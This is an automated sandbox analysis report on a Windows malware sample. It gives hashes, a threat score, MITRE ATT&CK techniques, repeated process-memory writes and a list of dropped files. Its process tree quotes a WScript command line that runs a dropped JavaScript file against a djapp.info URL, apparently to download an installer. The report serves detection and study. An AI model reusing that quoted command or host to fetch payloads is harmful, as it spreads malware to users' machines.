c41c7bef9a29fda257e8c1ced572121ebeacea30732f8f7a2b32b8e169a27f8c

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03-05-2024 00:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe
Size

184KB
MD5

0f4b8b08ca35a0fc099fa7bc7386950d
SHA1

9b3e6a44767ac36c75f9cb704883320123d806cd
SHA256

c41c7bef9a29fda257e8c1ced572121ebeacea30732f8f7a2b32b8e169a27f8c
SHA512

37ccbef69d5fcb68d865b986f840ff42eac569096f41dc31b047858d783c8d78a12316089b512655ff02f59d21cd952c53ec1fe3649fcda96313c207168099a5
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndnC

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	272	WScript.exe
8	272	WScript.exe
10	272	WScript.exe
12	2704	WScript.exe
13	2704	WScript.exe
15	2740	WScript.exe
16	2740	WScript.exe
18	544	WScript.exe
19	544	WScript.exe
22	2136	WScript.exe
23	2136	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
664	2936	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 272	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	28
PID 2936 wrote to memory of 272	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	28
PID 2936 wrote to memory of 272	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	28
PID 2936 wrote to memory of 272	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	28
PID 2936 wrote to memory of 2704	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	30
PID 2936 wrote to memory of 2704	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	30
PID 2936 wrote to memory of 2704	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	30
PID 2936 wrote to memory of 2704	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	30
PID 2936 wrote to memory of 2740	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	32
PID 2936 wrote to memory of 2740	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	32
PID 2936 wrote to memory of 2740	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	32
PID 2936 wrote to memory of 2740	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	32
PID 2936 wrote to memory of 544	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	34
PID 2936 wrote to memory of 544	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	34
PID 2936 wrote to memory of 544	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	34
PID 2936 wrote to memory of 544	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	34
PID 2936 wrote to memory of 2136	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	36
PID 2936 wrote to memory of 2136	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	36
PID 2936 wrote to memory of 2136	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	36
PID 2936 wrote to memory of 2136	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	36
PID 2936 wrote to memory of 664	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	38
PID 2936 wrote to memory of 664	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	38
PID 2936 wrote to memory of 664	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	38
PID 2936 wrote to memory of 664	2936	0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0f4b8b08ca35a0fc099fa7bc7386950d_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1371.js" http://www.djapp.info/?domain=DImPhFpsDE.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf1371.exe
  2⤵
  - Blocklisted process makes network request
  PID:272
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1371.js" http://www.djapp.info/?domain=DImPhFpsDE.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf1371.exe
  2⤵
  - Blocklisted process makes network request
  PID:2704
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1371.js" http://www.djapp.info/?domain=DImPhFpsDE.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf1371.exe
  2⤵
  - Blocklisted process makes network request
  PID:2740
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1371.js" http://www.djapp.info/?domain=DImPhFpsDE.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf1371.exe
  2⤵
  - Blocklisted process makes network request
  PID:544
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1371.js" http://www.djapp.info/?domain=DImPhFpsDE.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LqLq03XsbiOoT422CoD2PbBmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGR5fAdya_AVfM5WDCCiFjq0Q_-oh5o-M5OF63BlqhRev22Xv04wsBHPY C:\Users\Admin\AppData\Local\Temp\fuf1371.exe
  2⤵
  - Blocklisted process makes network request
  PID:2136
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 560
  2⤵
  - Program crash
  PID:664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
5f8a57d43d2c9bb4f19fac37d4a16bc7

SHA1
b592a28d89ca394d25ab1e92406033d468ea2ec1

SHA256
e19d65c0440adf6d57d81481145b5e61ff4f291c81136e610d3d0926dec85faf

SHA512
51c5ef2b2f2843c991107848e3739814e219676aafc1edf4be7618166912036c22487f05d64cc3c2ce85585c1b474c2e841a0d15450fd3631891e27965a58a1c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
f984833948a38fe2f82bcffdb3f6dca9

SHA1
22428597e23a0d1e59e4dbb14fafd148a09bfe99

SHA256
ac185d04310c6ef6ab821f7c71d6f0d22b25178d5b940aad80377b170bb27dba

SHA512
be41929b5ff5ba31bd869d09c201a45f8898cd948a8a7f5b91c2eaae70c88edc5d1113d81dceae5b89fd230d7df0c24942fc0f5b92d43b3799848829c1004876

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9a775344e6d4202c6c4962fd2ffc2ba1

SHA1
38e2e12caa6325bfec89cc1aadb5213a64bd7b35

SHA256
5f88a827f778588c0efae86e4eb3ad95658e6df4d5095ea0dfd3460c78b07a02

SHA512
7b8f906170abe2a6401e41229d115499a00038c742ec703aaabc1da9bcd0be819a2097619a10a326a5b49546fce94d1b3cffcf7fde26d27b6a2363abd57ce3d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
f21e863e3d6b19130238b6ce6a71f3e6

SHA1
68ecf13ba84f43aa440bfadb9d50ad35859e4d32

SHA256
5954fb8d2e6eb05a2abc2a41910c723c1a371305f23d9e3627992997f7e54d5a

SHA512
750d7d09ef74fea16888b9531cd1110c2e85b299a69f791d6343336674f042628a9a2ac7a13beb685181173f3965a82dd1f9169b55d1c0571034214a82ee0b6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

Filesize
40KB

MD5
5b9bda3527353d3e37a5b60737cbfb56

SHA1
456038df46cee5b8b9719f5e756f88bf3de038ae

SHA256
d35269630f871fb08c356ed9b33933e05c0dc6fba00d197ecd77f7c559b59959

SHA512
eebeecccfb9b9ecd8c8a6012970144815cbebbf6dd0bd342a9ad66436e195554e0ebd03e56451ea41f40a472cb42a76053fd705eb08c84de3a67760e149f53d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm

Filesize
6KB

MD5
91b692a9811bd005021508b04e09bf8d

SHA1
9e4ef7a2be72334e87d935e9563760b451e1c51c

SHA256
656849780a7d2217cff533442066a69dc0b7be1863214c30327affb329123ce9

SHA512
b147b9d6d97b5f8127815e563de9f99784092d188a0ec45d7cad90bd22706bdbb0c1db82f94c7e7d23a84d40de0d5b9ff135520e07f629bffcc6557e1980acca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

Filesize
6KB

MD5
a91683f98def591bd752ad29f6a69639

SHA1
958a6a52cfdffe75e0708bb9c8045631ed317946

SHA256
7c6f16ddbc1ab760a9e22e232e9db236d3f82277495c850efe370da386b89d0b

SHA512
fdd83dab249091c43e0e10d83a58d5cdd2aa43a4920e910ec02719c4b1592ac204e72d95ba9169a76c5731bc4536c23794f3ce285f34e9958271ec0e57ede5e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm

Filesize
6KB

MD5
49a35769f0b76d27445ba66da5271444

SHA1
b6f59be8814ffdd27cd4ddd29ce2a3cc982f27b6

SHA256
915d32a45b84cc3f270f28735e4d75d7c0ab81eaed5fa07f1593fcd32ba89ac8

SHA512
76e1bf382e924c9c610a2c0773e9602ac6d09ae277b0bec5ebc878848fb6b17f29fa8863ee36ab706829a66cb80fa0fc97197aa49529700296555740491cf0b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5B59.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar73AB.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1371.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\F1TRKUIK.txt

Filesize
175B

MD5
ee26bcc0b479800cde895c73392ff967

SHA1
3579cd8eacdfe784ef8d351f06c1e3bd609fc9bf

SHA256
475f0f42d70aee1d5a67cf0c098a8a0fdbe27c74dcbee0d8bc6a67dd6a84215b

SHA512
60ee2bac90263e3d83fbc817f54869e7a1de8a10c4a5d0690297ceae54b4a19606f4e3878ea2471c9864b17f6bd0c50aab7e6b941611290e076dff80c93837bb

Download Submit